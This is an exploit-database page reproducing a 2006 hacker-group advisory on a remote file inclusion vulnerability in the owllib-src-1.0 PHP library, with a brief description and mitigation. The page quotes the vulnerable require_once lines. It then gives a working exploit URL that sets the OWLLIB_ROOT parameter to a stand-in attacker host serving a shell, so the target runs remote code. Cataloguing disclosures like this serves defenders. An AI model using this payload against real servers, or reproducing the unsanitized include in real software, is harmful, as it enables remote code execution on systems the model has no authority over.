header-logo
Suggest Exploit
vendor:
owllib-src-1.0
by:
DeltahackingTEAM
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: owllib-src-1.0
Affected Version From: owllib-src-1.0
Affected Version To: owllib-src-1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

owllib-src-1.0

A remote file inclusion vulnerability exists in the owllib-src-1.0 portal. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the OWLLIB_ROOT parameter. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name : owllib-src-1.0

* Class = Remote File Inclusion ;
 
* Download =http://heanet.dl.sourceforge.net/sourceforge/phpowllib/owllib-src-1.0.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Dr.Pantagon )

* With the special  thanks of my financial sponser Tanha
----------------------------------------------------------------------------------------------------------
- Vulnerable Code

require_once "$OWLLIB_ROOT/OWLProperty.php";
require_once "$OWLLIB_ROOT/memory/OWLMemoryClass.php";
++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

    http://[target]/[path]/owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=http://evilsite.com/shell?

***********************
I LOVE YOU G.Malake
***********************
----------------------------------------------------------------------------------------------------------
Greetz:Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc

# milw0rm.com [2006-11-23]